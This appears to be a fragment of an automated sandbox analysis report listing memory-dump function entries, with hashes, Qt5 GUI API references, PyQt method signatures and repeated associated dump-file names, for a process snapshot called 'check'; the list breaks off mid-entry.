                                                                                                                                                                                                                • Opcode ID: 65bb031d51951a060c30fad87d3a943cbca37c52a262cfa0f4cae2c0a0c0d2e8
                                                                                                                                                                                                                • Instruction ID: 3cf733a85844ca22ae0d1ecd9c02de15eef4a3f45de5860b547f470f5b34f9e2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65bb031d51951a060c30fad87d3a943cbca37c52a262cfa0f4cae2c0a0c0d2e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 662107B6B08F56C0EB609F65E8881A933A8FB58B80F9181B6CE9D43720DF3DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setFileName@PictureString@@@
                                                                                                                                                                                                                • String ID: BJ1$QPictureIO$setFileName$setFileName(self, a0: Optional[str])
                                                                                                                                                                                                                • API String ID: 3214566917-123792022
                                                                                                                                                                                                                • Opcode ID: bd4cdeceed91f6762166c2767631444ac2120b65c46703ba11cb66e490bbf2ab
                                                                                                                                                                                                                • Instruction ID: 03a2cd63ec1d9841aabbf8052163faf84398a1aa9c92e09931f68d9fa02c760b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd4cdeceed91f6762166c2767631444ac2120b65c46703ba11cb66e490bbf2ab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D421F5B6B08B56C0EB609B21E8885A933A8FB49B94F9180B6CA9D43320DF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setFormats@QTextLayout@@QEAAXAEBV?$QVector@UFormatRange@QTextLayout@@@@@Z.QT5GUI ref: 00007FFB9A2F79C0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?setFormatFormats@Layout@@Layout@@@@@Range@Vector@
                                                                                                                                                                                                                • String ID: BJ1$QTextLayout$setFormats$setFormats(self, overrides: Iterable[QTextLayout.FormatRange])
                                                                                                                                                                                                                • API String ID: 2978315198-3499376178
                                                                                                                                                                                                                • Opcode ID: ad41754c563ba37af9bfe682f7e6f241ef3bc75f8fc0d4bab2327b6258424d2d
                                                                                                                                                                                                                • Instruction ID: d6333817cb7e78dcdb2f69e9ed7ae04c2cf755c75ab8bdaec212805e69ed8721
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad41754c563ba37af9bfe682f7e6f241ef3bc75f8fc0d4bab2327b6258424d2d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC2118B6B08F46C0EB209F25E8881A933A8FB49B84F9181B6CE9D43320DF3DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?fill@?$QVector@VQPoint@@@@QEAAAEAV1@AEBVQPoint@@H@Z.QT5CORE ref: 00007FFB9A2E39AF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?fill@?$Point@@Point@@@@Vector@
                                                                                                                                                                                                                • String ID: BJ9|i$QPolygon$fill$fill(self, value: QPoint, size: int = -1)
                                                                                                                                                                                                                • API String ID: 4025833221-2906954916
                                                                                                                                                                                                                • Opcode ID: a67caa17e82b44df6a525373bbc4b926246a952906db9cc83f5d07c85412aa25
                                                                                                                                                                                                                • Instruction ID: 0a7cbdba9ac51975d5bf0637dd630c32483855799a92cf7e334200414c5742c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a67caa17e82b44df6a525373bbc4b926246a952906db9cc83f5d07c85412aa25
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0210976B18F56C1EB608F25E8882A933B8FB49790F914176CAAD43760DF3DD959C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setDevice@@Name@String@@@Touch
                                                                                                                                                                                                                • String ID: BJ1$QTouchDevice$setName$setName(self, name: Optional[str])
                                                                                                                                                                                                                • API String ID: 276416834-2037791626
                                                                                                                                                                                                                • Opcode ID: 6014710a04d3315eccbcbe7d4048e30585a7252428fcd225f511147842726a59
                                                                                                                                                                                                                • Instruction ID: 5def6c98e6b6f7f344416ddcd76b0cb4b3a597ad9605c295958764a7616f7e23
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6014710a04d3315eccbcbe7d4048e30585a7252428fcd225f511147842726a59
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5921C2B6A08B5681EB609F25E8885A933B8FB49B80F9181B6CE9D43720DF79D549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFB9A32DF28
                                                                                                                                                                                                                • ??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFB9A32DF34
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
                                                                                                                                                                                                                • String ID: QPalette$base$base(self) -> QBrush
                                                                                                                                                                                                                • API String ID: 868068763-3618895797
                                                                                                                                                                                                                • Opcode ID: 18297d4eef2ae7eb2a78e0fc1b57f0899b91f4577cf65eb44086b3209b9a32bf
                                                                                                                                                                                                                • Instruction ID: 501b9b2c4c1b961a78ae2e2540258de5d0ae6008480129c886cb8dc645afd8c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18297d4eef2ae7eb2a78e0fc1b57f0899b91f4577cf65eb44086b3209b9a32bf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 481128B5B18B8681EB60DF21E8887A937A8FB95B84FA140B6DE4D07320DF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFB9A32DBA8
                                                                                                                                                                                                                • ??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFB9A32DBB4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
                                                                                                                                                                                                                • String ID: QPalette$text$text(self) -> QBrush
                                                                                                                                                                                                                • API String ID: 868068763-2773970170
                                                                                                                                                                                                                • Opcode ID: 1199e82a74767107699b8b3867134bb85bed704959f74e5e7127ce58e4918856
                                                                                                                                                                                                                • Instruction ID: 37346ee23f9049aef978acc97dfa197fc882506422341481ac0974aed8523f97
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1199e82a74767107699b8b3867134bb85bed704959f74e5e7127ce58e4918856
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02116DB5B18B8681EB60CF21E8487A937A8FB85B84FA140B6CE4D07320DF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?beginInsertColumns@QAbstractItemModel@@IEAAXAEBVQModelIndex@@HH@Z.QT5CORE ref: 00007FFB9A2E1F93
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?beginAbstractColumns@Index@@InsertItemModelModel@@
                                                                                                                                                                                                                • String ID: BJ9ii$QStandardItemModel$beginInsertColumns$beginInsertColumns(self, parent: QModelIndex, first: int, last: int)
                                                                                                                                                                                                                • API String ID: 4214563904-3799555195
                                                                                                                                                                                                                • Opcode ID: 87a85bd005ecb9a0180467e0126543098b03dd43ff15df220713baac90e3c5c1
                                                                                                                                                                                                                • Instruction ID: 7d710888da1e36f55b8ae37c25513bcf2e47e9468261d5622c612b57fc99bd24
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87a85bd005ecb9a0180467e0126543098b03dd43ff15df220713baac90e3c5c1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E21F4B6B18B5A80EB208F61E8886A933A8FB48B84F614176CA5C07720DF79D959C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?itemText@QTextList@@QEBA?AVQString@@AEBVQTextBlock@@@Z.QT5GUI ref: 00007FFB9A2D3B80
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
